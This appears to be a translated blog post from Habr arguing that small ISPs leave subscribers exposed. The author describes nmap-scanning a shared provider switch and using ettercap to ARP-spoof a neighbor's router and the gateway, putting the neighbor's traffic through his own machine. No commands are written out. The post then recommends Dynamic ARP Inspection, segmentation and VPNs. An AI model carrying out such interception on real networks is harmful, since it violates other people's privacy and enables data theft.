Many companies today are concerned about the issue of ensuring the information security of their infrastructure, some do it at the request of regulatory documents, and some from the moment the first incident occurs. Recent trends show that the number of incidents is growing, and the attacks themselves are becoming more sophisticated. But you don't have to go far, the danger is much closer. This time I would like to raise the topic of ISP security. On HabrΓ© there are posts in which this topic was discussed at the application level. This article will focus on security at the network and link levels.
From what it all began
Some time ago, the apartment was provided with Internet from a new provider, earlier Internet services were supplied to the apartment using ADSL technology. Since I spend little time at home, mobile Internet was more in demand than home. With the transition to remote work, I decided that the speed of 50-60 Mb / s for home Internet is just not enough and decided to increase the speed. According to ADSL technology, for technical reasons, the speed over 60 Mb / s cannot be increased. It was decided to switch to another provider with a different declared speed and already with the provision of non-ADSL services.
Could be somehow different
I contacted the representative of the Internet provider. The installers came, drilled a hole into the apartment, put in an RJ-45 patch cord. They gave me an agreement and instructions with the network settings that need to be set on the router (dedicated ip, gateway, subnet mask and ip addresses of their DNS), took payment for the first month of work and left. When I entered the network settings given to me into my home router, the Internet broke into the apartment. The procedure for the initial entry into the network of a new subscriber seemed too simple to me. No initial authorization was made, and my identifier was the ip address given to me. The Internet worked quickly and stably. A wifi router worked in the apartment and the connection speed sagged a little through a load-bearing wall. One day, it was necessary to download a file of two dozen gigabytes in size. I thought, why not connect the RJ-45 going to the apartment directly to the PC.
Know thy neighbor
After downloading the entire file, I decided to get to know the neighbors in the switch sockets better.
In apartment buildings, often the Internet connection comes from the provider via optics, enters the switching closet into one of the switches and is distributed between entrances, apartments via Ethernet cables, if we consider the most primitive connection scheme. Yes, there is already technology when optics goes straight to the apartment (GPON), but this is not so widespread yet.
If we take a very simplified topology on the scale of one house, then it looks something like this:
It turns out that the clients of this provider, some neighboring apartments, work in the same local network on the same switching equipment.
By enabling listening on an interface connected directly to the provider's network, you can see ARP broadcast traffic flying from all hosts on the network.
The provider decided not to bother too much with dividing the network into small segments, so broadcast traffic from 253 hosts could walk within one switch, except for those that were turned off, thereby clogging the channel bandwidth.
Having scanned the network using nmap, the number of active hosts from the entire address pool, the software version and open ports of the main switch were determined:
And where is ARP there nearby and ARP-spoofing
To carry out further actions, the ettercap-graphical utility was used, there are more modern analogues, but this software attracts with its primitive graphical interface and ease of use.
In the first column, the IP addresses of all routers that responded to the ping, in the second, their physical addresses.
The physical address is unique, it can be used to collect information about the geographic location of the router and so on, so it will be hidden within the framework of this article.
With target 1 we add the default gateway with the address 192.168.xxx.1, with target 2 we add one of the other addresses.
We introduce ourselves to the gateway as a host with the address 192.168.xxx.204, but with our own MAC address. Then we introduce ourselves to the user router as a gateway with the address 192.168.xxx.1 with our own MAC. The details of this ARP protocol vulnerability are detailed in other articles that are easily googled.
As a result of all manipulations, we have traffic from hosts that goes through us, after enabling packet forwarding:
Yes, https is already used almost everywhere, but the network is still full of other insecure protocols. For example, the same DNS with a DNS-spoofing attack. The very fact that a MITM attack is possible gives rise to many other attacks. Things get worse when there are several dozen active hosts available on the network. It is worth considering that this is a private sector, not a corporate network, and not everyone has protections for detecting and countering accompanying attacks.
How to avoid it
The provider should be concerned about this problem, it is very easy to configure protection against such attacks, in the case of the same Cisco switch.
Enabling Dynamic ARP Inspection (DAI) would prevent spoofing the MAC address of the main gateway. Breaking the broadcast domain into smaller segments at least prevented ARP traffic from spreading to all hosts in a row and reducing the number of hosts that could be attacked. The client, in turn, can protect himself from such manipulations by setting up a VPN directly on his home router, most devices already support this functionality.
Conclusions
Most likely, providers do not care about this, all efforts are aimed at increasing the number of customers. This material was not written to demonstrate the attack, but to remind you that even your provider's network may not be very secure for transferring your data. I am sure that there are many small regional Internet service providers who have done nothing more than what is necessary for the basic operation of network equipment.
Source: habr.com